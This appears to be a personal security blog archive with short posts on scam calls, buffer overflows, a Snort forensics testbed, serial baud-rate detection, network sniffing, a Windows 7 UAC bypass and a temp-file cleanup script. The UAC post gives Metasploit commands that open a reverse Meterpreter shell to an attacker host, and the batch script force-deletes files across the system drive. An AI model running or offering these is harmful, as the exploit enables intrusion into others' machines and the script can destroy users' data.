Sunday, 24 June 2018

Eleven Tips for Women and Children to Avoid Scam Calls

 

Phone scams are popular atghese days, we faced many challenges to avoid Women and children being trapped by scammers.

Your Self and Family members whom you love can be safe from such scams, by following below process: 

  1. Don't answer calls from unknown numbers. If you answer such a call, hang up immediately.
  2. You may not be able to tell right away if an incoming call is spoofed. Be aware: Caller ID showing a "local" number does not necessarily mean it is a local caller.
  3. If you answer the phone and the caller - or a recording - asks you to hit a button to stop getting the calls, you should just hang up. Scammers often use this trick to identify potential targets.
  4. Do not respond to any questions, especially those that can be answered with "Yes."
  5. Never give out personal information such as account numbers, Social Security numbers, mother's maiden names, passwords or other identifying information in response to unexpected calls or if you are at all suspicious.
  6. If you get an inquiry from someone who says they represent a company or a government agency, hang up and call the phone number on your account statement, in the phone book, or on the company's or government agency's website to verify the authenticity of the request. You will usually get a written statement in the mail before you get a phone call from a legitimate source, particularly if the caller is asking for a payment.
  7. Use caution if you are being pressured for information immediately.
  8. If you have a voice mail account with your phone service, be sure to set a password for it. Some voicemail services are preset to allow access if you call in from your own phone number. A hacker could spoof your home phone number and gain access to your voice mail if you do not set a password.
  9. Talk to your phone company about call blocking tools they may have and check into apps that you can download to your mobile device to block unwanted calls.
  10. If you use robocall-blocking technology already, it often helps to let that company know which numbers are producing unwanted calls so they can help block those calls for you and others.
  11. To block telemarketing calls, register your number on the Do Not Call List. Legitimate telemarketers consult the list to avoid calling both landline and wireless phone numbers on the list.
Posted by at 20:00 0 comments

Tuesday, 10 October 2017

How to Target Buffer Overflows and Countermeasure

 A large number of exploits have been due to sloppy software development. 

Exceeding array bounds is referred to in security circles as "Buffer Overflow."

Buffer Overlows are targetted on Stack and Heap.

As a Researcher, where should you look at the BufferOverflows in the target programmes ?

  1. Stack allocation - Is it randomised ??
  2. Unchecked array index usage
  3. Copying a given argument into a local array - Is the code checking the length of input ??
  4. Supplying a carefully constructed string argument - Is the code restricting malicious inputs??
  5. The string has the executable machine code -- Does the memory have executable permissions ??

How to Detect the Buffer Overflow Scenarios
  1. Checking the caller of execv system call
  2. Deep packet inspection - monitong for payloads
  3. Tools: Chaperon, Valgrind, CCured, CRED, Insure++, ProPolice and TinyCC, many more.

ProActively Prevet your programme to get exploited.
  1. CPU/MMU: Separate address spaces for Data and Machine Instructions
    1. noexec-user-stack
    2. Never-eXecute (NX) bit http://en.wikipedia.org/wiki/NX_bit
    3. Intel: XD bit, eXecute Disable
    4. AMD: Enhanced Virus Protection
    5. ARM: XN for eXecute Never
  2. Stack top randomization
  3. ASLR Address space layout randomization
  4. Run-time Check for Input Taintedness
  5. Run-time Check for Array Bounds

In SDLC LifeCycle, where can you have the Buffer Overflows identified and fixed ?
1. Source Code Development stage
2. Product alidation stage 


Posted by at 08:56 0 comments

Friday, 15 November 2013

TestBed: Identify Network Attacks for your Forensics --- SNORT + PCAP

In our analysis we deploy below tools on Single Host:
    a. TSHARK
    b. SNORT (loaded with latest rule-set from http://rules.emergingthreats.net/ )
    c. TCPREPLAY

START:
1. Create eth0 interface with PROMISCIOUS flag enabled
       root@n41k# ifconfig eth0 up (waking up eth0 interface)
       root@n41k# ifconfig eth0 promisc (enable promiscuous flag)
       root@n41k# ifconfig eth0 -promisc (After analysis remove promiscuous flag)

Output:
eth0      Link encap:Ethernet  HWaddr 00:aa:b9:c8:d5:6f  
             UP BROADCAST PROMISC MULTICAST  MTU:1500  Metric:1
             RX packets:0 errors:0 dropped:0 overruns:0 frame:0
             TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000 
             RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
             Interrupt:45 Base address:0x4000 

2. Analyze Network Traffic Capture with TSHARK
        root@n41k#tshark -R "tcp.port==80" -r /home/n41k/threat/botnet.pcap 
        root@n41k#tshark -R "http.response.code == 200" -r /home/n41k/threat/botnet.pcap 
        root@n41k#tshark -R "http.response.code == 404" -r /home/n41k/threat/botnet.pcap 
        root@n41k#tshark -R 'http.request.method == "GET" || http.request.method == "POST"' -r          /home/n41k/threat/botnet.pcap 

3. Configure SNORT and Verify the process list

4. Inject the packets
     root@n41k# tcpreplay -i eth0 -t /home/n41k/threat/botnet.pcap

5. Monitor SNORT logs.
    root@n41k# tail -f /var/log/snort/snort.alert

6. Further Analysis and Verification of Domain listed
          • http://support.clean-mx.de/clean-mx/viruses.php
          • http://malc0de.com/database/
          • http://www.malwareblacklist.com/showMDL.php
          • http://www.malwaredomainlist.com/mdl.php
          • http://www.malwareurl.com/listing-urls.php

                           
Posted by at 17:26 1 comments

Saturday, 16 February 2013

Discover BaudRate of your Embedded device

It is enriching by finding the baudrate of an unknown hardware without owning any specs...

 Tool: baudrate.py
Referencehttps://code.google.com/p/baudrate/source/browse/trunk/src/baudrate.py

 Sample Usage:
#  ./baudrate.py -p /dev/ttyS0  (or)
$ sudo ./baudrate.py -p /dev/ttyUSB0

 >> Change baudrate manually by pressing UP / DOWN arrow keys



Starting baudrate detection on /dev/ttyUSB0, turn on your serial device now.
Press Ctl+C to quit.


@@@@@@@@@@@@@@@@@@@@@ Baudrate: 115200 @@@@@@@@@@@@@@@@@@@@@
Detected baudrate: 115200

Save minicom configuration as: minicom1
 
Configuration saved. Run minicom now [n/Y]? n
Posted by at 21:02 0 comments

Tuesday, 13 November 2012

Good Virus - Clean and Speed your PC

Create a .BAT file and make your PC to work faster.

Open a File, paste the below code and save it as GoodVirus.bat


 @echo off
echo Internet Sweep ....
echo waiting
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
echo Cleaned Temporary Data
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
echo Cleaning IE Temp data.....
del /f /s /q ?%userprofile%\Local Settings\Temporary Internet Files\*.*?
del /f /s /q ?%userprofile%\Local Settings\Temp\*.*?
del /f /s /q ?%userprofile%\recent\*.*?
echo Completed!!!
echo Your PC is now Speed enough :)
echo. & pause
Posted by at 01:38 0 comments

Monday, 15 October 2012

Windows 7 is hacked !!!! Threat: UAC


Test-Bed

Attacker: Backtrack 5
Victim PC: Windows 7 - UPDATED
[Attacker] ----------|Switch/Router|----------[Victim]
Procedure
1. Update MSFCONSOLE repository 
      #msf update 
2. Prepare Attacker Machine
use exploit/windows/local/ask
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.9.9
set session 1
exploit
3. OUTPUT
     "Windows7 is hacked"
Posted by at 11:13 0 comments

Saturday, 4 February 2012

Network Sniffing - Facts

Few secrets which can be revealed by Sniffing:
1. Mac & IP's --> Helpful for Spoofing (Hide identity / Intend as authorised user)
2. Exposing Services --> Revealing running services & versions 
3. Passwords --> Plain text protocols 
4. Security Feature Detection --> Running security (FW/AV/IPS/VPN/WAF) functionality
5. Debugging --> Confirmance, IOT, etc..
6. Investigations --> POST analysis


Posted by at 10:23 0 comments
Subscribe to: Comments (Atom)